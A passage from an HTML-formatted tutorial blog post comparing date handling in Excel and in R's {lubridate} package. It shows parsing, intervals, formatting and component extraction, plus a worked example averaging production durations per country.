some limitations when it comes to complex date calculations, and it can
be time-consuming to work with dates in large datasets.&lt;/p&gt;
&lt;p&gt;In contrast, R has a robust set of tools for handling dates, including
the &lt;a href="https://lubridate.tidyverse.org/" rel="external"&gt;{lubridate}&lt;/a&gt; package, which
simplifies the manipulation of dates and times. Additionally, R allows
for efficient handling of dates in large datasets, making it a powerful
tool for time-series analysis. Whether you are working with dates in
Excel or R, this blog will provide you with the basic tools and
techniques to handle dates efficiently and accurately. So let’s get
started!&lt;/p&gt;
&lt;h3 id="handling-dates-using-lubridate"&gt;Handling dates using {lubridate}&lt;/h3&gt;
&lt;p&gt;The {lubridate} package provides a range of functions that simplify
common tasks. {lubridate} makes working with dates and times more
intuitive and less error-prone, allowing users to focus on their
analysis rather than the difficulties of date manipulation.&lt;/p&gt;
&lt;p&gt;The {lubridate} package provides:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;User-friendly syntax: consistent and intuitive syntax which makes it
easier to understand and write code for date operations.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Comprehensive functionality: offers a range of built-in functions for
common date operations. It allows us to parse dates from different
formats and extract information such as year, month and day. This
functionality saves time and effort compared to manual
calculations in Excel.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Date representation: {lubridate} ensures consistent date
representation by building on R’s Date and POSIXct classes, which store dates as
the number of days, and date-times as the number of seconds, since 1 January 1970.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-date-r-excel-datetimes-transition"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="converting-dates"&gt;Converting dates:&lt;/h3&gt;
&lt;p&gt;In Excel, to convert a string into a date format, you can use the
&lt;code&gt;DATEVALUE()&lt;/code&gt; function. For example, if your date is in cell &lt;code&gt;A2&lt;/code&gt;, you
can use &lt;code&gt;=DATEVALUE(A2)&lt;/code&gt; to convert it into a date format. In R, you can
use the &lt;code&gt;as_date()&lt;/code&gt; function to convert a string into a date format. For
example, if your date is &lt;code&gt;&amp;quot;2023-01-18&amp;quot;&lt;/code&gt;, you can use
&lt;code&gt;as_date(&amp;quot;2023-01-18&amp;quot;)&lt;/code&gt;.&lt;/p&gt;
&lt;h4 id="r"&gt;R&lt;/h4&gt;
&lt;p&gt;In R, running the &lt;code&gt;class()&lt;/code&gt; function on &lt;code&gt;as_date(&amp;quot;2023-01-18&amp;quot;)&lt;/code&gt;
returns the class or data type of the object. In this case, it
returns “Date”, since &lt;code&gt;as_date(&amp;quot;2023-01-18&amp;quot;)&lt;/code&gt; converts the given string
into a date object. By contrast, an unquoted &lt;code&gt;2023-05-16&lt;/code&gt; is evaluated as arithmetic, so its class is “numeric”.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;class&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;2023-05-16&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;numeric&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;lubridate&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;as_date&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;2023-01-18&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;2023-01-18&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;class&lt;/span&gt;(lubridate&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;as_date&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;2023-01-18&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;Date&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="calculating-time-intervals"&gt;Calculating time intervals:&lt;/h3&gt;
&lt;p&gt;In Excel, you can use the &lt;code&gt;DATEDIF()&lt;/code&gt; function to calculate the time
difference between two dates in various units (years, months, etc.). For
example, if you want to calculate the number of days between two dates
in cells &lt;code&gt;A2&lt;/code&gt; and &lt;code&gt;B2&lt;/code&gt;, you can use &lt;code&gt;= DATEDIF(A2,B2,&amp;quot;d&amp;quot;)&lt;/code&gt;. In R, using
{lubridate}, you can calculate the difference in dates using the
&lt;code&gt;interval()&lt;/code&gt; function. Let’s calculate the difference between the two
dates specified (January 18, 2023 and May 16, 2023) in terms of days.&lt;/p&gt;
&lt;h4 id="excel"&gt;Excel&lt;/h4&gt;
&lt;p&gt;The screenshot shows how you would use &lt;code&gt;= DATEDIF()&lt;/code&gt; in a cell to
calculate the interval between two dates.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/date-r-excel-datetimes-transition/graphics/date_difference.png" alt="Screenshot of the data in an Excel spreadsheet. A2 contains 2023-01-18, B2 contains 2023-05-16 and C2 contains =DATEDIF(A2, B2,'d')" style="width: 400px; display: block; margin-left: auto; margin-right: auto; class:image-center"/&gt;
&lt;h4 id="r-1"&gt;R&lt;/h4&gt;
&lt;p&gt;The following code performs the same action in R, taking the start date
and end date and building an interval between them. We then convert the
interval to a duration with &lt;code&gt;as.duration()&lt;/code&gt; and express it in days
using &lt;code&gt;as.numeric()&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;lubridate&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Attaching package: &amp;#39;lubridate&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## The following objects are masked from &amp;#39;package:base&amp;#39;:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## date, intersect, setdiff, union&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;start_date &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as_date&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;2023-01-18&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;end_date &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as_date&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;2023-05-16&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;diff_date &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;interval&lt;/span&gt;(start_date, end_date) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as.duration&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as.numeric&lt;/span&gt;(units &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;days&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;diff_date
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] 118&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="formatting-dates"&gt;Formatting dates:&lt;/h3&gt;
&lt;p&gt;Dates in Excel can be formatted using the Format Cells feature. For
example, you can format a date as &lt;code&gt;dd-mmm-yyyy&lt;/code&gt; to display it as
&lt;code&gt;&amp;quot;16-May-2023&amp;quot;&lt;/code&gt;. In R, you can use the &lt;code&gt;format()&lt;/code&gt; function to format a
date in various ways.&lt;/p&gt;
&lt;h4 id="excel-1"&gt;Excel&lt;/h4&gt;
&lt;p&gt;The following gif shows the manual process of formatting a date in Excel
using the Format&amp;gt;Format cells process.&lt;/p&gt;
&lt;p&gt;&lt;img alt="A gif displaying the manual process of formatting a date in Excel." height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/date-r-excel-datetimes-transition/graphics/date_formatting.gif" width="1920"&gt;&lt;/p&gt;
&lt;h4 id="r-2"&gt;R&lt;/h4&gt;
&lt;p&gt;The following lines of code accomplish the same thing.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;date &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; lubridate&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;as_date&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;2023-05-16&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;date_formatted &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;format&lt;/span&gt;(date, &lt;span style="color:#a5d6ff"&gt;&amp;#34;%d-%b-%Y&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;date_formatted
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;16-May-2023&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Overall, Excel and R have different syntax and functions for handling
dates, but both can be used effectively for data analysis and
manipulation. It’s important to choose the tool that is best suited for
your specific needs and workflow.&lt;/p&gt;
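&lt;p&gt;As a brief sketch of other layouts, the &lt;code&gt;format()&lt;/code&gt; call shown above accepts
further &lt;code&gt;strptime&lt;/code&gt;-style codes. The variable name &lt;code&gt;example_date&lt;/code&gt; is
only an illustrative assumption. Note that month names produced by &lt;code&gt;%b&lt;/code&gt; and
&lt;code&gt;%B&lt;/code&gt; depend on the locale of your R session, whereas numeric codes such as
&lt;code&gt;%m&lt;/code&gt; do not.&lt;/p&gt;
&lt;pre&gt;&lt;code class="language-r" data-lang="r"&gt;# Illustrative date; base R only, no extra packages needed
example_date = as.Date(&amp;#34;2023-05-16&amp;#34;)

# Numeric codes do not depend on the session locale
format(example_date, &amp;#34;%d/%m/%Y&amp;#34;)
## [1] &amp;#34;16/05/2023&amp;#34;
format(example_date, &amp;#34;%Y%m%d&amp;#34;)
## [1] &amp;#34;20230516&amp;#34;

# Two-digit year
format(example_date, &amp;#34;%d.%m.%y&amp;#34;)
## [1] &amp;#34;16.05.23&amp;#34;
&lt;/code&gt;&lt;/pre&gt;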
&lt;h3 id="extracting-components-of-a-date"&gt;Extracting components of a date:&lt;/h3&gt;
&lt;p&gt;In R, you can extract different components of a date, such as the year,
month, or day, using various functions. For example:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;my_date &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; lubridate&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;as_date&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;2023-05-16&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;year&lt;/span&gt;(my_date)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] 2023&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;month&lt;/span&gt;(my_date)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] 5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;day&lt;/span&gt;(my_date)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] 16&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In Excel, you can extract different components of a date using the
&lt;code&gt;YEAR()&lt;/code&gt;, &lt;code&gt;MONTH()&lt;/code&gt;, and &lt;code&gt;DAY()&lt;/code&gt; functions.&lt;/p&gt;
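&lt;p&gt;{lubridate} also provides accessors beyond year, month and day. The
following is a minimal sketch, assuming {lubridate} is installed; the
variable name &lt;code&gt;example_date&lt;/code&gt; is illustrative only.&lt;/p&gt;
&lt;pre&gt;&lt;code class="language-r" data-lang="r"&gt;library(&amp;#34;lubridate&amp;#34;)

example_date = as_date(&amp;#34;2023-05-16&amp;#34;)

# Quarter of the year (1 to 4)
quarter(example_date)
## [1] 2

# Day of the year (1 to 366)
yday(example_date)
## [1] 136

# Day of the week as a number, counting Monday as day 1
wday(example_date, week_start = 1)
## [1] 2
&lt;/code&gt;&lt;/pre&gt;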
&lt;h4 id="the-movies-data"&gt;The Movies Data&lt;/h4&gt;
&lt;p&gt;Let’s dive into more advanced examples of working with dates in R and
Excel. In our &lt;a href="https://www.jumpingrivers.com/blog/why-create-plots-in-r-part-2/" rel="external"&gt;previous
blog&lt;/a&gt;
series comparing Excel and R, we utilised a dataset called “movies data”
which consists of five columns: country, year, highest movie profit,
number of movies produced, and number of employees involved in the
production. We’ve added two new columns to our dataset called
&lt;code&gt;start_date&lt;/code&gt; and &lt;code&gt;end_date&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(readr)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;movies_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;read_csv&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;blog-data.csv&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Rows: 6 Columns: 7&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## ── Column specification ────────────────────────────────────────────────────────&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Delimiter: &amp;#34;,&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## chr (1): Country&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## dbl (4): Year, Highest_profit, Number_movies, no_employees&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## date (2): start_date, end_date&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## ℹ Use `spec()` to retrieve the full column specification for this data.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## ℹ Specify the column types or set `show_col_types = FALSE` to quiet this message.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(movies_data)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 6 × 7&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Country Year Highest_profit Number_movies no_employees start_date end_date &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;date&amp;gt; &amp;lt;date&amp;gt; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 England 2011 100 3 1500 2011-01-16 2011-08-19&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 America 2012 150 2 2000 2012-03-21 2012-09-21&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 America 2013 300 4 4000 2013-01-01 2012-11-12&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 England 2013 130 2 4020 2013-01-04 2013-05-04&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 South K… 2013 177 3 5300 2013-01-28 2013-09-22&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 America 2014 350 1 3150 2014-01-01 2014-12-12&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Let’s say we wanted to calculate the duration in days for each movie
production, and then find the average duration per country.&lt;/p&gt;
&lt;h4 id="r-3"&gt;R&lt;/h4&gt;
&lt;p&gt;In R, we can accomplish this by using the {lubridate} and
&lt;a href="https://dplyr.tidyverse.org/" rel="external"&gt;{dplyr}&lt;/a&gt; packages. The first portion of
this code takes the start and end dates of the movie production as
dates, and then calculates the time between the dates, converting it to
a numeric type. The second part then calculates the mean production time
as a summary statistic.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(lubridate)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(dplyr)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Attaching package: &amp;#39;dplyr&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## The following objects are masked from &amp;#39;package:stats&amp;#39;:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## filter, lag&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## The following objects are masked from &amp;#39;package:base&amp;#39;:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## intersect, setdiff, setequal, union&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;movies_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; movies_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(start_date &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as_date&lt;/span&gt;(start_date),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; end_date &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as_date&lt;/span&gt;(end_date),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; duration &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as.numeric&lt;/span&gt;(end_date &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt; start_date))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;average_duration &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; movies_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;group_by&lt;/span&gt;(Country) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;summarise&lt;/span&gt;(average_duration &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mean&lt;/span&gt;(duration, na.rm &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="in-excel"&gt;In Excel&lt;/h4&gt;
&lt;p&gt;In Excel, you would need to use formulas and functions such as
&lt;code&gt;DATEDIF()&lt;/code&gt; and &lt;code&gt;AVERAGEIF()&lt;/code&gt; to achieve similar results. Let’s take a
moment to refresh our memory on how the movie data is structured within
an Excel sheet.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/date-r-excel-datetimes-transition/graphics/the_data.png" alt="Screenshot of the data in an Excel spreadsheet." style="width: 800px; display: block; margin-left: auto; margin-right: auto; class:image-cente"/&gt;
&lt;p&gt;The following are the steps to accomplish the above task in Excel:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;In cell H2, enter the formula to calculate the duration:&lt;/li&gt;
&lt;/ol&gt;
&lt;!-- --&gt;
&lt;pre&gt;&lt;code&gt;=G2-F2
&lt;/code&gt;&lt;/pre&gt;
&lt;ol start="2"&gt;
&lt;li&gt;
&lt;p&gt;Press Enter to calculate the duration for the first row.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Drag the formula down from cell H2 to fill the formula for the
remaining rows.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;In cell I2, enter the formula to calculate the average duration per
country, where &lt;code&gt;country&lt;/code&gt; refers to the range of country values and
&lt;code&gt;duration&lt;/code&gt; refers to the range of duration values.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;!-- --&gt;
&lt;pre&gt;&lt;code&gt;=AVERAGEIF(country, A2, duration)
&lt;/code&gt;&lt;/pre&gt;
&lt;ol start="5"&gt;
&lt;li&gt;
&lt;p&gt;Press Enter to calculate the average duration for the first country.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Drag the formula down from cell I2 to fill the formula for the
remaining countries.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;In this Excel approach, we used formulas and functions such as
subtraction and &lt;code&gt;AVERAGEIF()&lt;/code&gt; to perform the calculations. While it is
possible to achieve the desired results in Excel, the process involves
multiple steps and formulas, and it may become more complex as the
dataset grows. R, however, simplifies the process with its built-in date
functions, resulting in cleaner and more efficient code.&lt;/p&gt;
&lt;h3 id="advantages-of-using-r"&gt;Advantages of using R:&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Flexibility: R allows us to work with date objects and apply
